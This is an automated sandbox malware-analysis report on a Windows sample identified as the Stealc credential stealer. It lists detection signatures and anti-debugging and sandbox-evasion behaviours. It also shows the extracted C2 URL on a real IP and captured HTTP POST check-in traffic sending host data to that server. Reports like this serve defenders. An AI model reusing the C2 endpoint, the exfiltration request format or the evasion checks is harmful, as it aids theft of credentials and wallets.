Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1544500
MD5:ab7d9340bee9cb1f62845fcaea9476cb
SHA1:aadac5ac21e4e0160dca5ac67727ab5bb436b63b
SHA256:390a2c58405e383d833df9f7bc6c5abcfa292b73e8297ccfe05c043b084ff29b
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7140 cmdline: "C:\Users\user\Desktop\file.exe" MD5: AB7D9340BEE9CB1F62845FCAEA9476CB)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.1803312962.0000000005120000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1845108606.000000000143E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7140JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7140JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.4e0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-29T14:11:19.442782+010020442431Malware Command and Control Activity Detected192.168.2.449735185.215.113.20680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.4e0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F9030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_004F9030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EA210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_004EA210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E72A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_004E72A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EA2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_004EA2B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EC920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_004EC920
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1803312962.000000000514B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1803312962.000000000514B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_004F40F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_004EE530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004E1710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_004F47C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004EF7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004F4B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004F3B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EDB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_004EDB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EBE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_004EBE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_004EEE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EDF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004EDF10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49735 -> 185.215.113.206:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAKEBGIIDAFIDHIIECFHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 41 4b 45 42 47 49 49 44 41 46 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 35 32 33 45 39 34 37 37 30 42 36 31 32 33 33 31 37 34 37 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 45 42 47 49 49 44 41 46 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 45 42 47 49 49 44 41 46 49 44 48 49 49 45 43 46 2d 2d 0d 0a Data Ascii: ------CBAKEBGIIDAFIDHIIECFContent-Disposition: form-data; name="hwid"69523E94770B612331747------CBAKEBGIIDAFIDHIIECFContent-Disposition: form-data; name="build"tale------CBAKEBGIIDAFIDHIIECF--
                Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E62D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_004E62D0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAKEBGIIDAFIDHIIECFHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 41 4b 45 42 47 49 49 44 41 46 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 35 32 33 45 39 34 37 37 30 42 36 31 32 33 33 31 37 34 37 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 45 42 47 49 49 44 41 46 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 45 42 47 49 49 44 41 46 49 44 48 49 49 45 43 46 2d 2d 0d 0a Data Ascii: ------CBAKEBGIIDAFIDHIIECFContent-Disposition: form-data; name="hwid"69523E94770B612331747------CBAKEBGIIDAFIDHIIECFContent-Disposition: form-data; name="build"tale------CBAKEBGIIDAFIDHIIECF--
                Source: file.exe, 00000000.00000002.1845108606.000000000143E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.1845108606.000000000143E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.1845108606.0000000001496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1845108606.0000000001483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.1845108606.0000000001483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php)
                Source: file.exe, 00000000.00000002.1845108606.0000000001496000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
                Source: file.exe, 00000000.00000002.1845108606.0000000001483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php1
                Source: file.exe, 00000000.00000002.1845108606.0000000001483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpI
                Source: file.exe, 00000000.00000002.1845108606.0000000001483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpQ
                Source: file.exe, 00000000.00000002.1845108606.0000000001483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpu
                Source: file.exe, 00000000.00000002.1845108606.0000000001496000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/B
                Source: file.exe, 00000000.00000002.1845108606.0000000001496000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/G
                Source: file.exe, file.exe, 00000000.00000003.1803312962.000000000514B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005200980_2_00520098
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005121380_2_00512138
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008631FB0_2_008631FB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053B1980_2_0053B198
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054E2580_2_0054E258
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093620F0_2_0093620F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005242880_2_00524288
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056B3080_2_0056B308
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0055D39E0_2_0055D39E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0085937D0_2_0085937D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050E5440_2_0050E544
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005045730_2_00504573
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009035F00_2_009035F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081E5FC0_2_0081E5FC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005245A80_2_005245A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054D5A80_2_0054D5A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0055A6480_2_0055A648
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005266C80_2_005266C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005696FD0_2_005696FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053D7200_2_0053D720
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005567990_2_00556799
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0092F8BA0_2_0092F8BA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005348680_2_00534868
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054F8D60_2_0054F8D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005398B80_2_005398B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E38790_2_008E3879
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053B8A80_2_0053B8A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00550B880_2_00550B88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F3B9C0_2_007F3B9C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00554BA80_2_00554BA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0055AC280_2_0055AC28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00937C690_2_00937C69
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00511D780_2_00511D78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053BD680_2_0053BD68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00932DDE0_2_00932DDE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0092DDF90_2_0092DDF9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054AD380_2_0054AD38
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00534DC80_2_00534DC8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00934D0E0_2_00934D0E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00535DB90_2_00535DB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00528E780_2_00528E78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00551EE80_2_00551EE8
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 004E4610 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: dlatbedx ZLIB complexity 0.994636372324159
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_004F9790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F3970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_004F3970
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\5QIB3M2K.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 2113024 > 1048576
                Source: file.exeStatic PE information: Raw size of dlatbedx is bigger than: 0x100000 < 0x198c00
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1803312962.000000000514B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1803312962.000000000514B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.4e0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;dlatbedx:EW;ncjyujoo:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;dlatbedx:EW;ncjyujoo:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004F9BB0
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x2128e0 should be: 0x20b53e
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: dlatbedx
                Source: file.exeStatic PE information: section name: ncjyujoo
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009AB093 push 464B3B47h; mov dword ptr [esp], ecx0_2_009AB116
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009AB093 push 18542B39h; mov dword ptr [esp], esi0_2_009AB1CD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009AB093 push 1881A88Ah; mov dword ptr [esp], ecx0_2_009AB20C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009AB093 push 7BA374A4h; mov dword ptr [esp], esi0_2_009AB21F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B30AB push 0B45413Ah; mov dword ptr [esp], edx0_2_009B3138
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B30AB push edx; mov dword ptr [esp], esi0_2_009B3156
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009E30F3 push eax; mov dword ptr [esp], edx0_2_009E3123
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0095F0EF push 01E2FD39h; mov dword ptr [esp], ebx0_2_0095F11D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0095F0EF push 0F78A9D0h; mov dword ptr [esp], ebx0_2_0095F15B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3701E push esi; mov dword ptr [esp], 693405E4h0_2_00A37048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3701E push 1B892BD1h; mov dword ptr [esp], edi0_2_00A3707F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3701E push 1B8CF3A1h; mov dword ptr [esp], eax0_2_00A37087
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3701E push 35E2E4FFh; mov dword ptr [esp], edi0_2_00A3709C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3701E push 417918B0h; mov dword ptr [esp], ebx0_2_00A370CC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3701E push eax; mov dword ptr [esp], ecx0_2_00A370E6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3701E push 43343203h; mov dword ptr [esp], ebx0_2_00A3713A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00876187 push ebx; mov dword ptr [esp], edx0_2_008761AC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00876187 push ebx; mov dword ptr [esp], edi0_2_008761B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00876187 push eax; mov dword ptr [esp], 32B7A65Ah0_2_008761BC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00876187 push edx; mov dword ptr [esp], eax0_2_008761C7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00876187 push esi; mov dword ptr [esp], 67C9EEA0h0_2_00876210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00876187 push 68497DBDh; mov dword ptr [esp], edi0_2_00876226
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00876187 push 16EF1105h; mov dword ptr [esp], ebx0_2_008762D2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00876187 push 0D4E20A8h; mov dword ptr [esp], ebp0_2_008762DA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0095E1BE push 3121B433h; mov dword ptr [esp], edi0_2_0095E25A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009491DC push ecx; mov dword ptr [esp], edi0_2_0094B386
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF81C7 push ebp; mov dword ptr [esp], 6B57B67Dh0_2_00BF81C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF81C7 push edx; mov dword ptr [esp], 67DF4CAFh0_2_00BF81E5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008631FB push edi; mov dword ptr [esp], ebx0_2_00863339
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008631FB push ebp; mov dword ptr [esp], 6378405Bh0_2_0086336E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008631FB push 7BEE6C96h; mov dword ptr [esp], edi0_2_008633A6
                Source: file.exeStatic PE information: section name: dlatbedx entropy: 7.952200303038952

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004F9BB0

